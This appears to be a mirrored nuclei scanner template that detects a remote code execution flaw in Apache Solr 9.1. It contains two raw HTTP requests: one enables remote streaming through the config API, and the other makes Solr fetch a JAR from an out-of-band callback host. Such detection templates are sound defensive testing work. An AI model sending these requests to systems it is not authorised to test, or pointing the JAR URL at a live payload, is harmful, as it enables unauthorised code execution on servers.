mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-05 02:03:35 +08:00
44 lines
1.4 KiB
YAML
44 lines
1.4 KiB
YAML
id: apache-solr-rce
|
|
|
|
info:
|
|
name: Apache Solr 9.1 - Remote Code Execution
|
|
author: j4vaovo
|
|
severity: critical
|
|
description: Apache Solr 9.1 is vulnerable to RCE.
|
|
reference:
|
|
- https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/
|
|
metadata:
|
|
max-request: 2
|
|
tags: solr,apache,rce,oast,intrusive,vuln
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
|
|
- |
|
|
POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9
|
|
|
|
--------------------------5897997e44b07bf9
|
|
Content-Disposition: form-data; name="stream.url"
|
|
|
|
jar:http://{{interactsh-url}}/test.jar?!/Test.class
|
|
--------------------------5897997e44b07bf9--
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "User-Agent: Java"
|
|
# digest: 4b0a00483046022100d7d4fd55c84e22f59b54ad48eab95a5efd282ba48f6abab2310bd80116fe01ae022100a9e287b1dc51fd89d9764fe4384f9e75116d8915822b91b941582b3fcd524f08:922c64590222798bb761d5b6d8e72950 |